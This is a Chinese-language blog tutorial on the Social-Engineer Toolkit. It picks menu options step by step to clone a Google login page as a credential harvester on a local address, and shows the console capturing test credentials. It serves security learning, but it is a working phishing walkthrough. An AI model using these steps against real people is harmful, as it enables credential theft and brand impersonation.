【安全系列】setoolkit钓鱼
setoolkit是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。
setoolkit 目录结构
modules readme README.md requirements.txt seautomate seproxy setoolkit setup.py seupdate src
**setoolkit启动 **
通过./setoolkit启动。看到如下图形,启动成功。
默认会有如下选项
Social-Engineering Attacks ##社会工程学攻击 Penetration Testing (Fast-Track) ##快速追踪测试 Third Party Modules ##第三方模块 Update the Social-Engineer Toolkit ##升级软件 Update SET configuration ##升级配置 Help, Credits, and About ##帮助 Exit the Social-Engineer Toolkit ##退出
这里制作个钓鱼网站为例子,选择1。
Spear-Phishing Attack Vectors ## 鱼叉式网络钓鱼 Website Attack Vectors ##网页攻击 钓鱼 Infectious Media Generator ## 感染性性攻击,就是木马 Create a Payload and Listener ##建立payloaad和listener Mass Mailer Attack ## 邮件群发攻击 Arduino-Based Attack Vector ## Arduino基础攻击 Wireless Access Point Attack Vector ##无线接入点攻击 QRCode Generator Attack Vector ##二维码攻击 Powershell Attack Vectors ##Powershell攻击 Third Party Modules ##第三反模块 Return back to the main menu.
选择2 网站攻击进行钓鱼。
Java Applet Attack Method ## java程序攻击 Metasploit Browser Exploit Method ##Metasploit 浏览器漏洞攻击 Credential Harvester Attack Method ##钓鱼网站攻击 Tabnabbing Attack Method Web Jacking Attack Method ## 网站jacking攻击 Multi-Attack Web Method ## 多种网站攻击方式 HTA Attack Method Return to Main Menu
选择3 钓鱼网站攻击。既然是网站钓鱼,就一定有网站的样式,这里是选择自己网站的样式,选择一个好的模板才能更好的社工。这里可以根据按照自己的喜欢自行选择。
Web Templates ## web Site Cloner ## 网站克隆设置 Custom Import ## 自定义导入 Return to Webattack Menu
**这里只是演示,我选择1。**之后输入用户请求提交地址。我本地演示,输入我本地地址,用来获取用户信息。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.31.188]:192.168.31.188
设置成功之后,默认带了3个模板供我们选择。这里我选择2 google的登录页面。
Java Required Google Twitter
选择2之后,服务启动,如下说明访问当前地址80端口即可。
set:webattack> Select a template:2 [*] Cloning the website: http://www.google.com [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
浏览器输入启动服务机器的ip+80端口;即可看到如下google登录页面。
在页面中试着输入账号密码,这里账号密码随意输入,对不对都行。之后点即 Sign in进行登录。随后控制台出现如下内容。
192.168.31.123 - - [25/Jul/2020 22:48:32] "GET / HTTP/1.1" 200 - 192.168.31.123 - - [25/Jul/2020 22:48:33] "GET /favicon.ico HTTP/1.1" 404 - [*] WE GOT A HIT! Printing the output: PARAM: GALX=SJLCkfgaqoM PARAM: continue=https://accounts.google.com/o/oauth2/auth? zt=ChR PARAM: service=lso PARAM: dsh=-73818871067 PARAM: _utf8=? PARAM: bgresponse=js_disab PARAM: pstMsg=1 PARAM: dnConn= PARAM: checkConnection= PARAM: checkedDomains=youtube POSSIBLE USERNAME FIELD FOUND: Email=123456 POSSIBLE PASSWORD FIELD FOUND: Passwd=654321 PARAM: signIn=Sign+in PARAM: PersistentCookie=yes [*] WHEN YOURE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
这里很清楚的发现,用户输入的Email为123456,密码是654321。
读到这里了,如果对你有帮助就留个赞吧。